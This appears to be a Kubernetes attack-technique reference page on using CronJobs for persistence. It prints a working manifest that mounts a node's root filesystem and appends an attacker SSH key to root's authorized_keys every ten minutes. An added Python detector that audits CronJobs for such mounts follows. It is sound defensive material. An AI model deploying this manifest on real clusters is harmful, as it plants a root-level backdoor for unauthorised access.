Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. Attackers may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.
One of the simplest and, at the same time, most efficient ways to deploy backdoor containers is to use a CronJob. The following adds the attacker’s SSH key to the authorized_keys file every 10 minutes on the node where the job is executed. To execute a task on every node in the cluster, also see “Backdoor Container”.
apiVersion: batch/v1
kind: CronJob
metadata:
  name: ssh-key-inject
spec:
  schedule: "*/10 * * * *"
  jobTemplate:
    spec:
      template:
        spec:
          containers:
          - name: evil
            image: ubuntu
            command: [ "/bin/sh", "-c", "mkdir -p /host/root/.ssh && echo 'ssh-rsa AAAAB3NzaC1y...CUkwfwh+iSTP' >> /host/root/.ssh/authorized_keys" ]
            volumeMounts:
            - name: host
              mountPath: /host
          volumes:
          - name: host
            hostPath:
              path: /
          restartPolicy: Never
Please note that this is a quick and dirty example made only for demonstration purposes; the authorized_keys file will fill up over time because every run appends the key again.
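For detection, the manifest above has two traits that can be audited: a CronJob pod template with a hostPath volume covering sensitive node directories, and a container command that references authorized_keys. The following is an added example, not part of the original page: it scans the JSON that `kubectl get cronjobs -A -o json` returns, and the `SENSITIVE` list, the function names and the sample data are assumptions made for illustration.

```python
import json

# Host directories whose exposure lets a pod alter node logins or kubelet state (assumed list).
SENSITIVE = ("/root", "/home", "/etc", "/var/lib/kubelet")

def risky(host_path):
    p = host_path.rstrip("/")  # "/" becomes "", which is a parent of every directory
    return any(p == s or p.startswith(s + "/") or s.startswith(p + "/") for s in SENSITIVE)

def audit_cronjobs(listing):
    """Return one finding per container mount of a risky hostPath in a CronJob."""
    findings = []
    for item in listing.get("items", [listing]):
        if item.get("kind") != "CronJob":
            continue
        meta, spec = item["metadata"], item["spec"]
        pod = spec["jobTemplate"]["spec"]["template"]["spec"]
        host_vols = {v["name"]: v["hostPath"]["path"]
                     for v in pod.get("volumes", []) if "hostPath" in v}
        for c in pod.get("containers", []) + pod.get("initContainers", []):
            cmdline = " ".join(c.get("command", []) + c.get("args", []))
            for m in c.get("volumeMounts", []):
                path = host_vols.get(m["name"])
                if path is None or not risky(path):
                    continue
                findings.append({
                    "cronjob": f'{meta.get("namespace", "default")}/{meta["name"]}',
                    "schedule": spec["schedule"], "container": c["name"],
                    "hostPath": path, "writable": not m.get("readOnly", False),
                    "touches_authorized_keys": "authorized_keys" in cmdline})
    return findings

# Constructed sample shaped like `kubectl get cronjobs -A -o json`; the key is a placeholder.
SAMPLE = json.loads("""{"kind": "List", "items": [
 {"kind": "CronJob", "metadata": {"name": "ssh-key-inject", "namespace": "default"},
  "spec": {"schedule": "*/10 * * * *", "jobTemplate": {"spec": {"template": {"spec": {
   "containers": [{"name": "evil", "image": "ubuntu",
     "command": ["/bin/sh", "-c", "echo 'ssh-rsa PLACEHOLDER' >> /host/root/.ssh/authorized_keys"],
     "volumeMounts": [{"name": "host", "mountPath": "/host"}]}],
   "volumes": [{"name": "host", "hostPath": {"path": "/"}}]}}}}}},
 {"kind": "CronJob", "metadata": {"name": "report", "namespace": "batch"},
  "spec": {"schedule": "0 3 * * *", "jobTemplate": {"spec": {"template": {"spec": {
   "containers": [{"name": "report", "volumeMounts": [{"name": "scratch", "mountPath": "/tmp/work"}]}],
   "volumes": [{"name": "scratch", "emptyDir": {}}]}}}}}}]}
""")

if __name__ == "__main__":
    for finding in audit_cronjobs(SAMPLE):
        print(json.dumps(finding))
```

A read-only mount of a risky path is still reported, with `writable` set to false, so it can be triaged separately from writable mounts.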